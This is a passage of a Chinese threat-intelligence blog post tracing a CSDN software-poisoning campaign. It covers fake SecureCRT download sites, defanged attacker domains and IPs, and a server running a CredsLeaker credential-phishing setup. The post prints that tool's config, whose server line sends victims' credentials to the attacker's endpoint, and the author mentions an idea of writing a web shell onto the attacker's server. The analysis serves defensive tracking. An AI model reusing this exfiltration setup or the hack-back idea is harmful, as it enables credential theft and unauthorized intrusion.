none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://scrt1.nyazz[.]com/SecureCRT.zip" target="_blank">https://scrt1.nyazz[.]com/SecureCRT.zip</a></span></code><span leaf=""> ， 是一个12月18日修改的 SecureCRT 压缩包。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">exe 程序没看到有什么问题，但是相关目录下存在一个10月19日修改过的 libEGL.dll 比较可疑。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">（这里样本分析不再赘述，后面的样本信息表格中汇总了关联逻辑关系。）</span></p><p><img data-imgfileid="100001341" class="rich_pages wxw-img" data-ratio="0.658157602663707" data-s="300,640" data-type="png" data-w="1802" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=69748866&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8y2pibYgGiciazs6e6Dkiaibka2LcMOzUbWYQRLDFLmDdQuIl1dFIYsfsCIA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">跟进到这里我开始感觉到奇怪，这些假冒官网的粗糙程度</span><strong style="color: rgb(0, 0, 0);font-weight: bold;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;"><span leaf="">很像银狐</span></strong><span leaf="">，但是 CSDN 这次的投毒事件的细腻程度多少带点 A 里 A 气啊，这里的样本拓展是不是哪里有点错误？</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">如果这两个假冒官网真的是攻击者的基础设施，那么意味着攻击者没事也跟银狐一样弄点假冒网站搞点投毒？投毒的话似乎目标就无法固定，只能买推广然后广撒网了吧？</span></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 18px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">第二次定性转折 - 红队？</span></span><span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">接下来我扫了下 web 目录，发现了一个 config.php。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">（www.7zei[.]com 解析到 154.19.200.214，后来发现这应该是台多 IP 机器，154.19.200.212 = 154.19.200.213 =154.19.200.214，不管访问哪个都等于访问 <a href="https://www.7zei[.]com）" target="_blank">https://www.7zei[.]com）</a></span></p><p><img data-imgfileid="100001343" class="rich_pages wxw-img" data-ratio="0.7557251908396947" data-s="300,640" data-type="png" data-w="1834" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=d16d172e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8icjdbicibKk40aGzv7aNVDwibZgyzEAfkO0edCPLGmdge0yoaNoMiak2xPg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">看到这里是不是会疑惑这是啥玩意。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">我首先确认了这个 cl_reader.php 确实存在，直接访问会提示你缺少参数，但是 creds.csv 不存在，看上去似乎是接收钓取到的凭据的回传脚本？跟老外玩的那一套比较像。</span></p><p><img data-imgfileid="100001344" class="rich_pages wxw-img" data-ratio="0.3093858632676709" data-s="300,640" data-type="png" data-w="1726" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=7a849301&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8pQ6lqKmOh9xWElic8icZCB0XwY0eEaR5D5sKaMhM8Ribk4TP14d4d0fmA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">我去 github 搜了一下这个脚本的名字，发现原来是一个后渗透的时候钓取目标机器账号密码的项目，还支持域环境。</span></p><p><img data-imgfileid="100001345" class="rich_pages wxw-img" data-ratio="0.20539906103286384" data-s="300,640" data-type="png" data-w="1704" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=c140880e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8PEGgHNHK9b6cajPgyPLRjxn3A1TpgMSBL8DCgRedfh3mmjKZchYofg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">可以看到项目有个配置文件 config.cl，我把 7zei 的 config.cl 下载下来跟原项目的对比了一下，发现这个配置文件还真是一个投入生产使用的正式配置。</span></p><p><img data-imgfileid="100001346" class="rich_pages wxw-img" data-ratio="0.18996865203761756" data-s="300,640" data-type="png" data-w="3190" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=0335b703&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8Jtyy1537yibPo3N1QgoJ5hHyyy88ZQjUzYAsuRkKfqtpuN7uobaBsXA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">攻击者在受害者电脑上执行 CredsLeaker.ps1，脚本来 config.cl 拉取回弹窗的配置，受害者输入的账号密码被回传到 cl_reader.php。</span></p><p><img data-imgfileid="100001347" class="rich_pages wxw-img" data-ratio="0.6942078364565588" data-s="300,640" data-type="png" data-w="2348" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=8159a292&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8TQja4icfM1ibG3Dib8Hw10eN5icbOBOZcuTn7N0c967xOicciaa4wPibZXwmA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">攻击者没有修改保存钓鱼成果的 txt 文件（这点也跟老外那一套很像），可以直接访问到，看密码似乎都是真实密码。</span></p><p><img data-imgfileid="100001349" class="rich_pages wxw-img" data-ratio="0.3330249768732655" data-s="300,640" data-type="png" data-w="2162" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=6d6bd50e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8PXfvs1O6kyYodwwz0aD0XACNnKN5dmpvU2da5Lib1K9mquv2ORzibpUQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">最一开始看到配置文件 config.php 这里狂喜，我寻思把 filename 改成 1.php，直接给他写个 shell 进去。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">结果仔细看完项目，发现这里的配置是写死了去修改配置 config.cl 的，是受害者机器上执行弹窗的配置，所以修改这里顶多能给受害者弹提醒 &#34;不要输入！&#34;。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLVqWiaaeT9kOQEt2bfEia4W7EoRzXmp7eqgMuAhxs2rWvP3tTPOtKEWS2EDsutXDwiabibvp9ugMDUyr/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span style="color: #d19a66;line-height: 26px;"><span leaf="">$Caption</span></span><span leaf=""> = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">&#39;Sign in&#39;</span></span><span leaf="">                //弹框标题</span><span leaf=""><br/></span><span style="color: #d19a66;line-height: 26px;"><span leaf="">$Message</span></span><span leaf=""> = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">&#39;Enter your credentials&#39;</span></span><span leaf="">               //弹框说明</span><span leaf=""><br/></span><span style="color: #d19a66;line-height: 26px;"><span leaf="">$Server</span></span><span leaf=""> = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">&#34;<a href="https://www.7zei.com/cl_reader.php?" target="_blank">https://www.7zei.com/cl_reader.php?</a>&#34;</span></span><span leaf="">   //回传地址</span><span leaf=""><br/></span><span style="color: #d19a66;line-height: 26px;"><span leaf="">$Port</span></span><span leaf=""> = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">&#34;80&#34;</span></span><span leaf=""><br/></span><span style="color: #d19a66;line-height: 26px;"><span leaf="">$delivery</span></span><span leaf=""> = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">&#34;https&#34;</span></span><span leaf=""><br/></span><span style="color: #d19a66;line-height: 26px;"><span leaf="">$filename</span></span><span leaf=""> = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">&#34;\cl_loot\creds.csv&#34;</span></span><span leaf="">                  //本地缓存文件</span><span leaf=""><br/></span><span style="color: #d19a66;line-height: 26px;"><span leaf="">$usblabel</span></span><span leaf=""> = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">&#34;USB_LABEL&#34;</span></span><span leaf=""><br/></span><span style="color: #d19a66;line-height: 26px;"><span leaf="">$mode</span></span><span leaf=""> = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">&#34;dynamic&#34;</span></span><span leaf=""><br/></span><span style="color: #d19a66;line-height: 26px;"><span leaf="">$timer</span></span><span leaf=""> = </span><span style="color: #d19a66;line-height: 26px;"><span leaf="">$null</span></span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">在 VT 上搜索 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">www.7zei[.]com</span></code><span leaf=""> 也能关联到这几个文件，其中 cl_params.ps1 的hash与 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://www.7zei[.]com/config.cl" target="_blank">https://www.7zei[.]com/config.cl</a></span></code><span leaf=""> 是对应的，而 lolz.ps1 与 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://www.7zei[.]com/CredsLeaker.ps1" target="_blank">https://www.7zei[.]com/CredsLeaker.ps1</a></span></code><span leaf=""> 的hash是对应的。</span></p><p><img data-imgfileid="100001348" class="rich_pages wxw-img" data-ratio="0.27722772277227725" data-s="300,640" data-type="png" data-w="1818" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=2595cb3f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8xGLYoYZPPSCwl9rqxkZjCM1rBRicRAZPqyiabJY8WicPknSybwOmoQRrg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">根据  lolz.ps1 还能追踪到一个新的样本 git-update.exe。</span></p><p><img data-imgfileid="100001350" class="rich_pages wxw-img" data-ratio="0.45587106676899464" data-s="300,640" data-type="png" data-w="2606" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=3117065e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8Xft4oc1KiaxBOcNO2sd2G4iamaqSjwbp7QHnqm448tsf90QS3rz7LaXQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">起初我以为这玩意不是自动化的，是攻击者有需要的时候调用一下子，通过 git-update.exe 的分析可以大致看出来拉取脚本并调用回传的过程，这么看的话钓取用户密码这部分功能有点像是自动化完成的（或者是手动执行的自动插件？）。</span></p><p><img data-imgfileid="100001352" class="rich_pages wxw-img" data-ratio="0.3153153153153153" data-s="300,640" data-type="png" data-w="2220" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=8eb4cfb3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8wYCUAEJSjIicvRsyhGNDTF7Bpx4P0pxSEGKYW2jr3kb0V12ppReWZCg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">至此，攻击者的身份从极具 APT 感觉的神秘黑客，到 low 了吧唧的银狐黑客，又增加了一点红队的色彩。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">一般来说类似银狐这种一股脑想办法让你上线这种黑客是比较常见的，这种钓密码的方式多少带点后渗透的意思了，毕竟现在能直接抓出来密码的机器越来越少，攻击者也许是为了下一步利用密码继续深入渗透？</span></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 18px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">第三次定性转折 - 菠菜猎人ever？</span></span><span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">根据奇安信文章中曝光的钓鱼页面特征 &#34;上游签发证书校验失败&#34; 字符串，进行网络测绘检索。</span></p><p><img data-imgfileid="100001351" class="rich_pages wxw-img" data-ratio="0.6820744081172492" data-s="300,640" data-type="webp" data-w="887" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=88cc1bfd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8nUPX0D2SyMFDh7EMLk7tPHvKnibYr64pYn8Z77BIDscKXBgiciaszAFVA%2F640%3Fwx_fmt%3Dwebp%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">可以找到 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">sslupdate[.]net (47.239.5.111)</span></code><span leaf="">。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这个域名比较特殊，并没有出现在奇安信的文章中，没记错的话在我最开始溯源的时候也还没有被奇安信 ti 标记。</span></p><p><img data-imgfileid="100001353" class="rich_pages wxw-img" data-ratio="0.5416666666666666" data-s="300,640" data-type="png" data-w="2256" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=f8755214&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8EU5hvXToPTFEu9PkmWpC0qV0NMHKsSicibJJTutLZUbKfUBdL5iaoicGXg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">域名最开始可以直接访问，</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://sslupdate[.]net/index.html" target="_blank">https://sslupdate[.]net/index.html</a></span></code><span leaf=""> 就是钓鱼页面，点击更新证书文件就会去拉取 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://analyzev.oss-cn-beijing.aliyuncs.com-cn-beijing.aliyuncs[.]com/update.exe" target="_blank">https://analyzev.oss-cn-beijing.aliyuncs.com-cn-beijing.aliyuncs[.]com/update.exe</a></span></code><span leaf=""> 。</span></p><p><img data-imgfileid="100001355" class="rich_pages wxw-img" data-ratio="0.4080267558528428" data-s="300,640" data-type="png" data-w="2990" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=2b37aa37&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8bLm5Il16fJjPPFgfaKyA0CUlrPLEyPAIWhSDPjjdBrp1YQfoQApdqQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">后来 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 